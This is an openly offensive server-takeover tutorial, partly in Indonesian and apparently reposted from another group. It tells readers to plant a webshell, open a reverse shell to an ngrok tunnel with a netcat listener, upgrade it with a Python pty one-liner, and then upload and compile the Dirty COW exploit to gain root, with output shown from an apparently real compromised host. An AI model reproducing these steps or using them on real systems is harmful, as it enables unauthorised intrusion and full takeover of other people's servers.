Lets start ...
Pahami Tutorial Dengan Benar , Jika Kurang Fokus Ini Akan Menjadi Hal Yang Sangat Rumit , Saya Melihat Tutorial Di Lulzsecindia , Saya Hanya Mempulikasi Ulang .
For that few things are required
- Ngrok
- Netcat
- webshell on server
- Root exploit
I suggest you to download WSO shell https://github.com/wso-shell/WSO/blob/master/WSO.php
if you want our private shell
the link will provided soon here ( * )
Step 1 : First thing first make sure your ngrok is running (else you will be end up with "mera connect nahi ho raha " )
Note : In some case server wont connect because sever may have restrict back connect or script which perform back connect get deleted from server (happen in very rare case for that we have another solution)
Step 2 : Make sure Netcat is listening on port , in my case i am using ( 1337 )
Command for Netcat : nc -lnvp 1337
ok this is grate
Ngrok has provided us a (dns , ip or url ) and port in my case this is
ip : 0.tcp.ngrok.io
port : 15288
and Netcat is listening on 1337
Open web shell i am using IndoXploit shell
go to network
see below
Then type your Ngrok ip and port like this .
now press the Reverse
After that see your netcat CMD it will be showing like this :
Now we need TTY shell you can use from this link https://netsec.ws/?p=337
or just copy this and paste : python -c 'import pty; pty.spawn("/bin/sh")'
After that you need to search the root exploit for this server .
as you can see i have done id and uname -a
it will show me id which is currently apache
id : [ uid=48(apache) gid=48(apache) groups=48(apache) ]
uname -a : Linux xxxxxxxx.pk 2.6.32-642.el6.x86_64 #1 SMP Tue May 10 17:27:01 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
see below image
Now we need to download root exploit which will give us root privilege of this server
in this tutorial i am using dirty cow it can be used for any server till september 2016 .link is here Raw.githubusercontent
*USE UPLOAD FUNCTION WHICH IS PRESENT IN SHELL TO UPLOAD .C FILE*
command : ls *.c
now we have to compile the po.c File using this command :
gcc -pthread po.c -o panda -lcryptnow we get the compiled file of that po.c in panda
next we have to permission to it
command : chmod +x panda
just simply pressing
./panda
([dot][slash]panda)
after that it will ask for password put the password
then re connect to the server
then type
su panda
then it will ask for password put your password again 😀😀😀😀
see what happen next in below image
see what happen next in below image
now just type id command
id : uid=0(panda) gid=0(root) groups=0(root)
If somewhat confusing, please comment below, then we will reply as soon as possible, if you like our article article please subs cribe.
Video Tutorial Agar Lebih Mudah Dipelajari , mungkin Tutorial Teks dan Video Agak Sedikit Berbeda Langsung Saja Liat Video Nya Disini
- Step 1 :
- Step 2
Suka Dengan Konten Kami ? Say hello ....